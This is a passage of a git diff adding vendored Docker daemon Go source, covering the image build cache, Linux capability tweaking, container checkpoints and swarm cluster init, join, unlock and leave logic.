+type imageCache struct { + sources []*image.Image + daemon *Daemon + localImageCache *localImageCache +} + +func (ic *imageCache) restoreCachedImage(parent, target *image.Image, cfg *containertypes.Config) (image.ID, error) { + var history []image.History + rootFS := image.NewRootFS() + lenHistory := 0 + if parent != nil { + history = parent.History + rootFS = parent.RootFS + lenHistory = len(parent.History) + } + history = append(history, target.History[lenHistory]) + if layer := getLayerForHistoryIndex(target, lenHistory); layer != "" { + rootFS.Append(layer) + } + + config, err := json.Marshal(&image.Image{ + V1Image: image.V1Image{ + DockerVersion: dockerversion.Version, + Config: cfg, + Architecture: target.Architecture, + OS: target.OS, + Author: target.Author, + Created: history[len(history)-1].Created, + }, + RootFS: rootFS, + History: history, + OSFeatures: target.OSFeatures, + OSVersion: target.OSVersion, + }) + if err != nil { + return "", errors.Wrap(err, "failed to marshal image config") + } + + imgID, err := ic.daemon.imageStore.Create(config) + if err != nil { + return "", errors.Wrap(err, "failed to create cache image") + } + + if parent != nil { + if err := ic.daemon.imageStore.SetParent(imgID, parent.ID()); err != nil { + return "", errors.Wrapf(err, "failed to set parent for %v to %v", target.ID(), parent.ID()) + } + } + return imgID, nil +} + +func (ic *imageCache) isParent(imgID, parentID image.ID) bool { + nextParent, err := ic.daemon.imageStore.GetParent(imgID) + if err != nil { + return false + } + if nextParent == parentID { + return true + } + return ic.isParent(nextParent, parentID) +} + +func (ic *imageCache) GetCache(parentID string, cfg *containertypes.Config) (string, error) { + imgID, err := ic.localImageCache.GetCache(parentID, cfg) + if err != nil { + return "", err + } + if imgID != "" { + for _, s := range ic.sources { + if ic.isParent(s.ID(), image.ID(imgID)) { + return imgID, nil + } + } + } + + var parent *image.Image + 
lenHistory := 0 + if parentID != "" { + parent, err = ic.daemon.imageStore.Get(image.ID(parentID)) + if err != nil { + return "", errors.Wrapf(err, "unable to find image %v", parentID) + } + lenHistory = len(parent.History) + } + + for _, target := range ic.sources { + if !isValidParent(target, parent) || !isValidConfig(cfg, target.History[lenHistory]) { + continue + } + + if len(target.History)-1 == lenHistory { // last + if parent != nil { + if err := ic.daemon.imageStore.SetParent(target.ID(), parent.ID()); err != nil { + return "", errors.Wrapf(err, "failed to set parent for %v to %v", target.ID(), parent.ID()) + } + } + return target.ID().String(), nil + } + + imgID, err := ic.restoreCachedImage(parent, target, cfg) + if err != nil { + return "", errors.Wrapf(err, "failed to restore cached image from %q to %v", parentID, target.ID()) + } + + ic.sources = []*image.Image{target} // avoid jumping to different target, tuned for safety atm + return imgID.String(), nil + } + + return "", nil +} + +func getImageIDAndError(img *image.Image, err error) (string, error) { + if img == nil || err != nil { + return "", err + } + return img.ID().String(), nil +} + +func isValidParent(img, parent *image.Image) bool { + if len(img.History) == 0 { + return false + } + if parent == nil || len(parent.History) == 0 && len(parent.RootFS.DiffIDs) == 0 { + return true + } + if len(parent.History) >= len(img.History) { + return false + } + if len(parent.RootFS.DiffIDs) >= len(img.RootFS.DiffIDs) { + return false + } + + for i, h := range parent.History { + if !reflect.DeepEqual(h, img.History[i]) { + return false + } + } + for i, d := range parent.RootFS.DiffIDs { + if d != img.RootFS.DiffIDs[i] { + return false + } + } + return true +} + +func getLayerForHistoryIndex(image *image.Image, index int) layer.DiffID { + layerIndex := 0 + for i, h := range image.History { + if i == index { + if h.EmptyLayer { + return "" + } + break + } + if !h.EmptyLayer { + layerIndex++ + } + } + return 
image.RootFS.DiffIDs[layerIndex] // validate? +} + +func isValidConfig(cfg *containertypes.Config, h image.History) bool { + // todo: make this format better than join that loses data + return strings.Join(cfg.Cmd, " ") == h.CreatedBy +} diff --git a/vendor/github.com/docker/docker/daemon/caps/utils_unix.go b/vendor/github.com/docker/docker/daemon/caps/utils_unix.go new file mode 100644 index 0000000000..c99485f51d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/caps/utils_unix.go @@ -0,0 +1,131 @@ +// +build !windows + +package caps + +import ( + "fmt" + "strings" + + "github.com/docker/docker/pkg/stringutils" + "github.com/syndtr/gocapability/capability" +) + +var capabilityList Capabilities + +func init() { + last := capability.CAP_LAST_CAP + // hack for RHEL6 which has no /proc/sys/kernel/cap_last_cap + if last == capability.Cap(63) { + last = capability.CAP_BLOCK_SUSPEND + } + for _, cap := range capability.List() { + if cap > last { + continue + } + capabilityList = append(capabilityList, + &CapabilityMapping{ + Key: "CAP_" + strings.ToUpper(cap.String()), + Value: cap, + }, + ) + } +} + +type ( + // CapabilityMapping maps linux capability name to its value of capability.Cap type + // Capabilities is one of the security systems in Linux Security Module (LSM) + // framework provided by the kernel. 
+ // For more details on capabilities, see http://man7.org/linux/man-pages/man7/capabilities.7.html + CapabilityMapping struct { + Key string `json:"key,omitempty"` + Value capability.Cap `json:"value,omitempty"` + } + // Capabilities contains all CapabilityMapping + Capabilities []*CapabilityMapping +) + +// String returns of CapabilityMapping +func (c *CapabilityMapping) String() string { + return c.Key +} + +// GetCapability returns CapabilityMapping which contains specific key +func GetCapability(key string) *CapabilityMapping { + for _, capp := range capabilityList { + if capp.Key == key { + cpy := *capp + return &cpy + } + } + return nil +} + +// GetAllCapabilities returns all of the capabilities +func GetAllCapabilities() []string { + output := make([]string, len(capabilityList)) + for i, capability := range capabilityList { + output[i] = capability.String() + } + return output +} + +// TweakCapabilities can tweak capabilities by adding or dropping capabilities +// based on the basics capabilities. +func TweakCapabilities(basics, adds, drops []string) ([]string, error) { + var ( + newCaps []string + allCaps = GetAllCapabilities() + ) + + // FIXME(tonistiigi): docker format is without CAP_ prefix, oci is with prefix + // Currently they are mixed in here. We should do conversion in one place. 
+ + // look for invalid cap in the drop list + for _, cap := range drops { + if strings.ToLower(cap) == "all" { + continue + } + + if !stringutils.InSlice(allCaps, "CAP_"+cap) { + return nil, fmt.Errorf("Unknown capability drop: %q", cap) + } + } + + // handle --cap-add=all + if stringutils.InSlice(adds, "all") { + basics = allCaps + } + + if !stringutils.InSlice(drops, "all") { + for _, cap := range basics { + // skip `all` already handled above + if strings.ToLower(cap) == "all" { + continue + } + + // if we don't drop `all`, add back all the non-dropped caps + if !stringutils.InSlice(drops, cap[4:]) { + newCaps = append(newCaps, strings.ToUpper(cap)) + } + } + } + + for _, cap := range adds { + // skip `all` already handled above + if strings.ToLower(cap) == "all" { + continue + } + + cap = "CAP_" + cap + + if !stringutils.InSlice(allCaps, cap) { + return nil, fmt.Errorf("Unknown capability to add: %q", cap) + } + + // add cap if not already in the list + if !stringutils.InSlice(newCaps, cap) { + newCaps = append(newCaps, strings.ToUpper(cap)) + } + } + return newCaps, nil +} diff --git a/vendor/github.com/docker/docker/daemon/changes.go b/vendor/github.com/docker/docker/daemon/changes.go new file mode 100644 index 0000000000..fc8cd2752c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/changes.go @@ -0,0 +1,31 @@ +package daemon + +import ( + "errors" + "runtime" + "time" + + "github.com/docker/docker/pkg/archive" +) + +// ContainerChanges returns a list of container fs changes +func (daemon *Daemon) ContainerChanges(name string) ([]archive.Change, error) { + start := time.Now() + container, err := daemon.GetContainer(name) + if err != nil { + return nil, err + } + + if runtime.GOOS == "windows" && container.IsRunning() { + return nil, errors.New("Windows does not support diff of a running container") + } + + container.Lock() + defer container.Unlock() + c, err := container.RWLayer.Changes() + if err != nil { + return nil, err + } + 
containerActions.WithValues("changes").UpdateSince(start) + return c, nil +} diff --git a/vendor/github.com/docker/docker/daemon/checkpoint.go b/vendor/github.com/docker/docker/daemon/checkpoint.go new file mode 100644 index 0000000000..27181743f5 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/checkpoint.go @@ -0,0 +1,110 @@ +package daemon + +import ( + "encoding/json" + "fmt" + "io/ioutil" + "os" + "path/filepath" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/utils" +) + +var ( + validCheckpointNameChars = utils.RestrictedNameChars + validCheckpointNamePattern = utils.RestrictedNamePattern +) + +// CheckpointCreate checkpoints the process running in a container with CRIU +func (daemon *Daemon) CheckpointCreate(name string, config types.CheckpointCreateOptions) error { + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + + if !container.IsRunning() { + return fmt.Errorf("Container %s not running", name) + } + + var checkpointDir string + if config.CheckpointDir != "" { + checkpointDir = config.CheckpointDir + } else { + checkpointDir = container.CheckpointDir() + } + + if !validCheckpointNamePattern.MatchString(config.CheckpointID) { + return fmt.Errorf("Invalid checkpoint ID (%s), only %s are allowed", config.CheckpointID, validCheckpointNameChars) + } + + err = daemon.containerd.CreateCheckpoint(container.ID, config.CheckpointID, checkpointDir, config.Exit) + if err != nil { + return fmt.Errorf("Cannot checkpoint container %s: %s", name, err) + } + + daemon.LogContainerEvent(container, "checkpoint") + + return nil +} + +// CheckpointDelete deletes the specified checkpoint +func (daemon *Daemon) CheckpointDelete(name string, config types.CheckpointDeleteOptions) error { + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + + var checkpointDir string + if config.CheckpointDir != "" { + checkpointDir = config.CheckpointDir + } else { + checkpointDir = 
container.CheckpointDir() + } + + return os.RemoveAll(filepath.Join(checkpointDir, config.CheckpointID)) +} + +// CheckpointList lists all checkpoints of the specified container +func (daemon *Daemon) CheckpointList(name string, config types.CheckpointListOptions) ([]types.Checkpoint, error) { + var out []types.Checkpoint + + container, err := daemon.GetContainer(name) + if err != nil { + return nil, err + } + + var checkpointDir string + if config.CheckpointDir != "" { + checkpointDir = config.CheckpointDir + } else { + checkpointDir = container.CheckpointDir() + } + + if err := os.MkdirAll(checkpointDir, 0755); err != nil { + return nil, err + } + + dirs, err := ioutil.ReadDir(checkpointDir) + if err != nil { + return nil, err + } + + for _, d := range dirs { + if !d.IsDir() { + continue + } + path := filepath.Join(checkpointDir, d.Name(), "config.json") + data, err := ioutil.ReadFile(path) + if err != nil { + return nil, err + } + var cpt types.Checkpoint + if err := json.Unmarshal(data, &cpt); err != nil { + return nil, err + } + out = append(out, cpt) + } + + return out, nil +} diff --git a/vendor/github.com/docker/docker/daemon/cluster.go b/vendor/github.com/docker/docker/daemon/cluster.go new file mode 100644 index 0000000000..98b2aa1e04 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster.go @@ -0,0 +1,12 @@ +package daemon + +import ( + apitypes "github.com/docker/docker/api/types" +) + +// Cluster is the interface for github.com/docker/docker/daemon/cluster.(*Cluster). 
+type Cluster interface { + GetNetwork(input string) (apitypes.NetworkResource, error) + GetNetworks() ([]apitypes.NetworkResource, error) + RemoveNetwork(input string) error +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/cluster.go b/vendor/github.com/docker/docker/daemon/cluster/cluster.go new file mode 100644 index 0000000000..4af035b523 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/cluster.go @@ -0,0 +1,1973 @@ +package cluster + +import ( + "crypto/x509" + "encoding/base64" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "net" + "os" + "path/filepath" + "runtime" + "strings" + "sync" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + distreference "github.com/docker/distribution/reference" + apierrors "github.com/docker/docker/api/errors" + apitypes "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/network" + types "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/daemon/cluster/convert" + executorpkg "github.com/docker/docker/daemon/cluster/executor" + "github.com/docker/docker/daemon/cluster/executor/container" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/signal" + "github.com/docker/docker/pkg/stdcopy" + "github.com/docker/docker/reference" + "github.com/docker/docker/runconfig" + swarmapi "github.com/docker/swarmkit/api" + "github.com/docker/swarmkit/manager/encryption" + swarmnode "github.com/docker/swarmkit/node" + "github.com/docker/swarmkit/protobuf/ptypes" + "github.com/pkg/errors" + "golang.org/x/net/context" + "google.golang.org/grpc" +) + +const swarmDirName = "swarm" +const controlSocket = "control.sock" +const swarmConnectTimeout = 20 * time.Second +const swarmRequestTimeout = 20 * time.Second +const stateFile = "docker-state.json" 
+const defaultAddr = "0.0.0.0:2377" + +const ( + initialReconnectDelay = 100 * time.Millisecond + maxReconnectDelay = 30 * time.Second + contextPrefix = "com.docker.swarm" +) + +// ErrNoSwarm is returned on leaving a cluster that was never initialized +var ErrNoSwarm = fmt.Errorf("This node is not part of a swarm") + +// ErrSwarmExists is returned on initialize or join request for a cluster that has already been activated +var ErrSwarmExists = fmt.Errorf("This node is already part of a swarm. Use \"docker swarm leave\" to leave this swarm and join another one.") + +// ErrPendingSwarmExists is returned on initialize or join request for a cluster that is already processing a similar request but has not succeeded yet. +var ErrPendingSwarmExists = fmt.Errorf("This node is processing an existing join request that has not succeeded yet. Use \"docker swarm leave\" to cancel the current request.") + +// ErrSwarmJoinTimeoutReached is returned when cluster join could not complete before timeout was reached. +var ErrSwarmJoinTimeoutReached = fmt.Errorf("Timeout was reached before node was joined. The attempt to join the swarm will continue in the background. Use the \"docker info\" command to see the current swarm status of your node.") + +// ErrSwarmLocked is returned if the swarm is encrypted and needs a key to unlock it. +var ErrSwarmLocked = fmt.Errorf("Swarm is encrypted and needs to be unlocked before it can be used. Please use \"docker swarm unlock\" to unlock it.") + +// ErrSwarmCertificatesExpired is returned if docker was not started for the whole validity period and they had no chance to renew automatically. +var ErrSwarmCertificatesExpired = errors.New("Swarm certificates have expired. To replace them, leave the swarm and join again.") + +// NetworkSubnetsProvider exposes functions for retrieving the subnets +// of networks managed by Docker, so they can be filtered. 
+type NetworkSubnetsProvider interface { + V4Subnets() []net.IPNet + V6Subnets() []net.IPNet +} + +// Config provides values for Cluster. +type Config struct { + Root string + Name string + Backend executorpkg.Backend + NetworkSubnetsProvider NetworkSubnetsProvider + + // DefaultAdvertiseAddr is the default host/IP or network interface to use + // if no AdvertiseAddr value is specified. + DefaultAdvertiseAddr string + + // path to store runtime state, such as the swarm control socket + RuntimeRoot string +} + +// Cluster provides capabilities to participate in a cluster as a worker or a +// manager. +type Cluster struct { + sync.RWMutex + *node + root string + runtimeRoot string + config Config + configEvent chan struct{} // todo: make this array and goroutine safe + actualLocalAddr string // after resolution, not persisted + stop bool + err error + cancelDelay func() + attachers map[string]*attacher + locked bool + lastNodeConfig *nodeStartConfig +} + +// attacher manages the in-memory attachment state of a container +// attachment to a global scope network managed by swarm manager. It +// helps in identifying the attachment ID via the taskID and the +// corresponding attachment configuration obtained from the manager. +type attacher struct { + taskID string + config *network.NetworkingConfig + attachWaitCh chan *network.NetworkingConfig + attachCompleteCh chan struct{} + detachWaitCh chan struct{} +} + +type node struct { + *swarmnode.Node + done chan struct{} + ready bool + conn *grpc.ClientConn + client swarmapi.ControlClient + logs swarmapi.LogsClient + reconnectDelay time.Duration + config nodeStartConfig +} + +// nodeStartConfig holds configuration needed to start a new node. Exported +// fields of this structure are saved to disk in json. Unexported fields +// contain data that shouldn't be persisted between daemon reloads. +type nodeStartConfig struct { + // LocalAddr is this machine's local IP or hostname, if specified. 
+ LocalAddr string + // RemoteAddr is the address that was given to "swarm join". It is used + // to find LocalAddr if necessary. + RemoteAddr string + // ListenAddr is the address we bind to, including a port. + ListenAddr string + // AdvertiseAddr is the address other nodes should connect to, + // including a port. + AdvertiseAddr string + joinAddr string + forceNewCluster bool + joinToken string + lockKey []byte + autolock bool +} + +// New creates a new Cluster instance using provided config. +func New(config Config) (*Cluster, error) { + root := filepath.Join(config.Root, swarmDirName) + if err := os.MkdirAll(root, 0700); err != nil { + return nil, err + } + if config.RuntimeRoot == "" { + config.RuntimeRoot = root + } + if err := os.MkdirAll(config.RuntimeRoot, 0700); err != nil { + return nil, err + } + c := &Cluster{ + root: root, + config: config, + configEvent: make(chan struct{}, 10), + runtimeRoot: config.RuntimeRoot, + attachers: make(map[string]*attacher), + } + + nodeConfig, err := c.loadState() + if err != nil { + if os.IsNotExist(err) { + return c, nil + } + return nil, err + } + + n, err := c.startNewNode(*nodeConfig) + if err != nil { + return nil, err + } + + select { + case <-time.After(swarmConnectTimeout): + logrus.Error("swarm component could not be started before timeout was reached") + case <-n.Ready(): + case <-n.done: + if errors.Cause(c.err) == ErrSwarmLocked { + return c, nil + } + if err, ok := errors.Cause(c.err).(x509.CertificateInvalidError); ok && err.Reason == x509.Expired { + c.err = ErrSwarmCertificatesExpired + return c, nil + } + return nil, fmt.Errorf("swarm component could not be started: %v", c.err) + } + go c.reconnectOnFailure(n) + return c, nil +} + +func (c *Cluster) loadState() (*nodeStartConfig, error) { + dt, err := ioutil.ReadFile(filepath.Join(c.root, stateFile)) + if err != nil { + return nil, err + } + // missing certificate means no actual state to restore from + if _, err := os.Stat(filepath.Join(c.root, 
"certificates/swarm-node.crt")); err != nil { + if os.IsNotExist(err) { + c.clearState() + } + return nil, err + } + var st nodeStartConfig + if err := json.Unmarshal(dt, &st); err != nil { + return nil, err + } + return &st, nil +} + +func (c *Cluster) saveState(config nodeStartConfig) error { + dt, err := json.Marshal(config) + if err != nil { + return err + } + return ioutils.AtomicWriteFile(filepath.Join(c.root, stateFile), dt, 0600) +} + +func (c *Cluster) reconnectOnFailure(n *node) { + for { + <-n.done + c.Lock() + if c.stop || c.node != nil { + c.Unlock() + return + } + n.reconnectDelay *= 2 + if n.reconnectDelay > maxReconnectDelay { + n.reconnectDelay = maxReconnectDelay + } + logrus.Warnf("Restarting swarm in %.2f seconds", n.reconnectDelay.Seconds()) + delayCtx, cancel := context.WithTimeout(context.Background(), n.reconnectDelay) + c.cancelDelay = cancel + c.Unlock() + <-delayCtx.Done() + if delayCtx.Err() != context.DeadlineExceeded { + return + } + c.Lock() + if c.node != nil { + c.Unlock() + return + } + var err error + config := n.config + config.RemoteAddr = c.getRemoteAddress() + config.joinAddr = config.RemoteAddr + n, err = c.startNewNode(config) + if err != nil { + c.err = err + close(n.done) + } + c.Unlock() + } +} + +func (c *Cluster) startNewNode(conf nodeStartConfig) (*node, error) { + if err := c.config.Backend.IsSwarmCompatible(); err != nil { + return nil, err + } + + actualLocalAddr := conf.LocalAddr + if actualLocalAddr == "" { + // If localAddr was not specified, resolve it automatically + // based on the route to joinAddr. localAddr can only be left + // empty on "join". 
+ listenHost, _, err := net.SplitHostPort(conf.ListenAddr) + if err != nil { + return nil, fmt.Errorf("could not parse listen address: %v", err) + } + + listenAddrIP := net.ParseIP(listenHost) + if listenAddrIP == nil || !listenAddrIP.IsUnspecified() { + actualLocalAddr = listenHost + } else { + if conf.RemoteAddr == "" { + // Should never happen except using swarms created by + // old versions that didn't save remoteAddr. + conf.RemoteAddr = "8.8.8.8:53" + } + conn, err := net.Dial("udp", conf.RemoteAddr) + if err != nil { + return nil, fmt.Errorf("could not find local IP address: %v", err) + } + localHostPort := conn.LocalAddr().String() + actualLocalAddr, _, _ = net.SplitHostPort(localHostPort) + conn.Close() + } + } + + var control string + if runtime.GOOS == "windows" { + control = `\\.\pipe\` + controlSocket + } else { + control = filepath.Join(c.runtimeRoot, controlSocket) + } + + c.node = nil + c.cancelDelay = nil + c.stop = false + n, err := swarmnode.New(&swarmnode.Config{ + Hostname: c.config.Name, + ForceNewCluster: conf.forceNewCluster, + ListenControlAPI: control, + ListenRemoteAPI: conf.ListenAddr, + AdvertiseRemoteAPI: conf.AdvertiseAddr, + JoinAddr: conf.joinAddr, + StateDir: c.root, + JoinToken: conf.joinToken, + Executor: container.NewExecutor(c.config.Backend), + HeartbeatTick: 1, + ElectionTick: 3, + UnlockKey: conf.lockKey, + AutoLockManagers: conf.autolock, + PluginGetter: c.config.Backend.PluginGetter(), + }) + + if err != nil { + return nil, err + } + ctx := context.Background() + if err := n.Start(ctx); err != nil { + return nil, err + } + node := &node{ + Node: n, + done: make(chan struct{}), + reconnectDelay: initialReconnectDelay, + config: conf, + } + c.node = node + c.actualLocalAddr = actualLocalAddr // not saved + c.saveState(conf) + + c.config.Backend.DaemonJoinsCluster(c) + go func() { + err := detectLockedError(n.Err(ctx)) + if err != nil { + logrus.Errorf("cluster exited with error: %v", err) + } + c.Lock() + c.node = nil + 
c.err = err + if errors.Cause(err) == ErrSwarmLocked { + c.locked = true + confClone := conf + c.lastNodeConfig = &confClone + } + c.Unlock() + close(node.done) + }() + + go func() { + select { + case <-n.Ready(): + c.Lock() + node.ready = true + c.err = nil + c.Unlock() + case <-ctx.Done(): + } + c.configEvent <- struct{}{} + }() + + go func() { + for conn := range n.ListenControlSocket(ctx) { + c.Lock() + if node.conn != conn { + if conn == nil { + node.client = nil + node.logs = nil + } else { + node.client = swarmapi.NewControlClient(conn) + node.logs = swarmapi.NewLogsClient(conn) + } + } + node.conn = conn + c.Unlock() + c.configEvent <- struct{}{} + } + }() + + return node, nil +} + +// Init initializes new cluster from user provided request. +func (c *Cluster) Init(req types.InitRequest) (string, error) { + c.Lock() + if c.swarmExists() { + if !req.ForceNewCluster { + c.Unlock() + return "", ErrSwarmExists + } + if err := c.stopNode(); err != nil { + c.Unlock() + return "", err + } + } + + if err := validateAndSanitizeInitRequest(&req); err != nil { + c.Unlock() + return "", err + } + + listenHost, listenPort, err := resolveListenAddr(req.ListenAddr) + if err != nil { + c.Unlock() + return "", err + } + + advertiseHost, advertisePort, err := c.resolveAdvertiseAddr(req.AdvertiseAddr, listenPort) + if err != nil { + c.Unlock() + return "", err + } + + localAddr := listenHost + + // If the local address is undetermined, the advertise address + // will be used as local address, if it belongs to this system. + // If the advertise address is not local, then we try to find + // a system address to use as local address. If this fails, + // we give up and ask user to pass the listen address. 
+ if net.ParseIP(localAddr).IsUnspecified() { + advertiseIP := net.ParseIP(advertiseHost) + + found := false + for _, systemIP := range listSystemIPs() { + if systemIP.Equal(advertiseIP) { + localAddr = advertiseIP.String() + found = true + break + } + } + + if !found { + ip, err := c.resolveSystemAddr() + if err != nil { + c.Unlock() + logrus.Warnf("Could not find a local address: %v", err) + return "", errMustSpecifyListenAddr + } + localAddr = ip.String() + } + } + + // todo: check current state existing + n, err := c.startNewNode(nodeStartConfig{ + forceNewCluster: req.ForceNewCluster, + autolock: req.AutoLockManagers, + LocalAddr: localAddr, + ListenAddr: net.JoinHostPort(listenHost, listenPort), + AdvertiseAddr: net.JoinHostPort(advertiseHost, advertisePort), + }) + if err != nil { + c.Unlock() + return "", err + } + c.Unlock() + + select { + case <-n.Ready(): + if err := initClusterSpec(n, req.Spec); err != nil { + return "", err + } + go c.reconnectOnFailure(n) + return n.NodeID(), nil + case <-n.done: + c.RLock() + defer c.RUnlock() + if !req.ForceNewCluster { // if failure on first attempt don't keep state + if err := c.clearState(); err != nil { + return "", err + } + } + return "", c.err + } +} + +// Join makes current Cluster part of an existing swarm cluster. +func (c *Cluster) Join(req types.JoinRequest) error { + c.Lock() + if c.swarmExists() { + c.Unlock() + return ErrSwarmExists + } + if err := validateAndSanitizeJoinRequest(&req); err != nil { + c.Unlock() + return err + } + + listenHost, listenPort, err := resolveListenAddr(req.ListenAddr) + if err != nil { + c.Unlock() + return err + } + + var advertiseAddr string + if req.AdvertiseAddr != "" { + advertiseHost, advertisePort, err := c.resolveAdvertiseAddr(req.AdvertiseAddr, listenPort) + // For joining, we don't need to provide an advertise address, + // since the remote side can detect it. 
+ if err == nil { + advertiseAddr = net.JoinHostPort(advertiseHost, advertisePort) + } + } + + // todo: check current state existing + n, err := c.startNewNode(nodeStartConfig{ + RemoteAddr: req.RemoteAddrs[0], + ListenAddr: net.JoinHostPort(listenHost, listenPort), + AdvertiseAddr: advertiseAddr, + joinAddr: req.RemoteAddrs[0], + joinToken: req.JoinToken, + }) + if err != nil { + c.Unlock() + return err + } + c.Unlock() + + select { + case <-time.After(swarmConnectTimeout): + // attempt to connect will continue in background, but reconnect only if it didn't fail + go func() { + select { + case <-n.Ready(): + c.reconnectOnFailure(n) + case <-n.done: + logrus.Errorf("failed to join the cluster: %+v", c.err) + } + }() + return ErrSwarmJoinTimeoutReached + case <-n.Ready(): + go c.reconnectOnFailure(n) + return nil + case <-n.done: + c.RLock() + defer c.RUnlock() + return c.err + } +} + +// GetUnlockKey returns the unlock key for the swarm. +func (c *Cluster) GetUnlockKey() (string, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return "", c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + client := swarmapi.NewCAClient(c.conn) + + r, err := client.GetUnlockKey(ctx, &swarmapi.GetUnlockKeyRequest{}) + if err != nil { + return "", err + } + + if len(r.UnlockKey) == 0 { + // no key + return "", nil + } + + return encryption.HumanReadableKey(r.UnlockKey), nil +} + +// UnlockSwarm provides a key to decrypt data that is encrypted at rest. 
+func (c *Cluster) UnlockSwarm(req types.UnlockRequest) error {
+	c.RLock()
+	if !c.isActiveManager() {
+		// ErrSwarmLocked is the one "no manager" condition that unlocking
+		// is meant to resolve; any other manager error is returned as-is.
+		if err := c.errNoManager(); err != ErrSwarmLocked {
+			c.RUnlock()
+			return err
+		}
+	}
+
+	// Unlocking is only valid when no node is running and the cluster was
+	// previously marked locked (see the ErrSwarmLocked handling that sets
+	// c.locked and c.lastNodeConfig in startNewNode).
+	if c.node != nil || !c.locked {
+		c.RUnlock()
+		return errors.New("swarm is not locked")
+	}
+	c.RUnlock()
+
+	key, err := encryption.ParseHumanReadableKey(req.UnlockKey)
+	if err != nil {
+		return err
+	}
+
+	// NOTE(review): the read lock is released above before the write lock is
+	// taken here, so another goroutine could change c.node/c.locked in
+	// between — confirm callers serialize UnlockSwarm.
+	c.Lock()
+	config := *c.lastNodeConfig
+	config.lockKey = key
+	n, err := c.startNewNode(config)
+	if err != nil {
+		c.Unlock()
+		return err
+	}
+	c.Unlock()
+	select {
+	case <-n.Ready():
+	case <-n.done:
+		// If the node comes up still locked, the supplied key failed to
+		// decrypt the stored state.
+		if errors.Cause(c.err) == ErrSwarmLocked {
+			return errors.New("swarm could not be unlocked: invalid key provided")
+		}
+		return fmt.Errorf("swarm component could not be started: %v", c.err)
+	}
+	go c.reconnectOnFailure(n)
+	return nil
+}
+
+// stopNode is a helper that stops the active c.node and waits until it has
+// shut down. Call while keeping the cluster lock.
+func (c *Cluster) stopNode() error {
+	if c.node == nil {
+		return nil
+	}
+	c.stop = true
+	if c.cancelDelay != nil {
+		c.cancelDelay()
+		c.cancelDelay = nil
+	}
+	node := c.node
+	ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second)
+	defer cancel()
+	// TODO: can't hold lock on stop because it calls back to network
+	c.Unlock()
+	defer c.Lock()
+	if err := node.Stop(ctx); err != nil && !strings.Contains(err.Error(), "context canceled") {
+		return err
+	}
+	<-node.done
+	return nil
+}
+
+// removingManagerCausesLossOfQuorum reports whether removing one reachable
+// manager, given the current reachable/unreachable counts, would leave the
+// remaining managers without a Raft quorum.
+func removingManagerCausesLossOfQuorum(reachable, unreachable int) bool {
+	return reachable-2 <= unreachable
+}
+
+// isLastManager reports whether the counts describe a cluster with exactly
+// one reachable manager and no unreachable ones.
+func isLastManager(reachable, unreachable int) bool {
+	return reachable == 1 && unreachable == 0
+}
+
+// Leave shuts down Cluster and removes current state.
+func (c *Cluster) Leave(force bool) error { + c.Lock() + node := c.node + if node == nil { + if c.locked { + c.locked = false + c.lastNodeConfig = nil + c.Unlock() + } else if c.err == ErrSwarmCertificatesExpired { + c.err = nil + c.Unlock() + } else { + c.Unlock() + return ErrNoSwarm + } + } else { + if node.Manager() != nil && !force { + msg := "You are attempting to leave the swarm on a node that is participating as a manager. " + if c.isActiveManager() { + active, reachable, unreachable, err := c.managerStats() + if err == nil { + if active && removingManagerCausesLossOfQuorum(reachable, unreachable) { + if isLastManager(reachable, unreachable) { + msg += "Removing the last manager erases all current state of the swarm. Use `--force` to ignore this message. " + c.Unlock() + return fmt.Errorf(msg) + } + msg += fmt.Sprintf("Removing this node leaves %v managers out of %v. Without a Raft quorum your swarm will be inaccessible. ", reachable-1, reachable+unreachable) + } + } + } else { + msg += "Doing so may lose the consensus of your cluster. " + } + + msg += "The only way to restore a swarm that has lost consensus is to reinitialize it with `--force-new-cluster`. Use `--force` to suppress this message." + c.Unlock() + return fmt.Errorf(msg) + } + if err := c.stopNode(); err != nil { + logrus.Errorf("failed to shut down cluster node: %v", err) + signal.DumpStacks("") + c.Unlock() + return err + } + c.Unlock() + if nodeID := node.NodeID(); nodeID != "" { + nodeContainers, err := c.listContainerForNode(nodeID) + if err != nil { + return err + } + for _, id := range nodeContainers { + if err := c.config.Backend.ContainerRm(id, &apitypes.ContainerRmConfig{ForceRemove: true}); err != nil { + logrus.Errorf("error removing %v: %v", id, err) + } + } + } + } + c.configEvent <- struct{}{} + // todo: cleanup optional? 
+ if err := c.clearState(); err != nil { + return err + } + + return nil +} + +func (c *Cluster) listContainerForNode(nodeID string) ([]string, error) { + var ids []string + filters := filters.NewArgs() + filters.Add("label", fmt.Sprintf("com.docker.swarm.node.id=%s", nodeID)) + containers, err := c.config.Backend.Containers(&apitypes.ContainerListOptions{ + Filters: filters, + }) + if err != nil { + return []string{}, err + } + for _, c := range containers { + ids = append(ids, c.ID) + } + return ids, nil +} + +func (c *Cluster) clearState() error { + // todo: backup this data instead of removing? + if err := os.RemoveAll(c.root); err != nil { + return err + } + if err := os.MkdirAll(c.root, 0700); err != nil { + return err + } + c.config.Backend.DaemonLeavesCluster() + return nil +} + +func (c *Cluster) getRequestContext() (context.Context, func()) { // TODO: not needed when requests don't block on qourum lost + return context.WithTimeout(context.Background(), swarmRequestTimeout) +} + +// Inspect retrieves the configuration properties of a managed swarm cluster. +func (c *Cluster) Inspect() (types.Swarm, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return types.Swarm{}, c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + swarm, err := getSwarm(ctx, c.client) + if err != nil { + return types.Swarm{}, err + } + + return 